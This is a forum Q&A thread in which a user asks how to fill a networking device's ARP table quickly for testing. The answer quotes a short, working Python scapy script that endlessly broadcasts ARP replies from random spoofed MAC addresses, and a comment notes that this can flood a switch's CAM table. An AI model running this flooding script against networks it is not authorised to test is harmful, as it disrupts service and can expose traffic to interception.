# Fill ARP table with as many entries possible

Tags: network, arp-spoofing

I am looking for a way to fill the ARP table with as much data in a short period of time as possible.

I am looking to do this because I would like to test the way my networking device handles a great number of ARP entries within x amount of time.

I am open to any solution, whether it be built in to a security suite or a python script that I get assistance writing.

I have tried researching Kali's features but I don't really even know the path I should be looking in.

Comment: http://stackoverflow.com/questions/1487389/python-scapy-mac-flooding-script has an answer which contains a few line of scapy code to do so.

Comment: scapy + python is probably going to be the answer

Comment: Most likely it will flood the [CAM table](https://en.wikipedia.org/wiki/Forwarding_information_base) and the switch may start behaving like a hub.

Answer (score 1):

Thank you for the comments.
With your comments, I was able to find a nice script on github:
https://github.com/mertkahyaoglu/macflood/blob/master/macflood.py

```
#!/usr/bin/env python
from scapy.all import *

vendor = "b8:e8:56:"
destMAC = "FF:FF:FF:FF:FF:FF"

while 1:
    randMAC = vendor + ':'.join(RandMAC().split(':')[3:])
    print randMAC
    sendp(Ether(src=randMAC ,dst=destMAC)/
    ARP(op=2, psrc="0.0.0.0", hwdst=destMAC)/Padding(load="X"*18),verbose=0)
```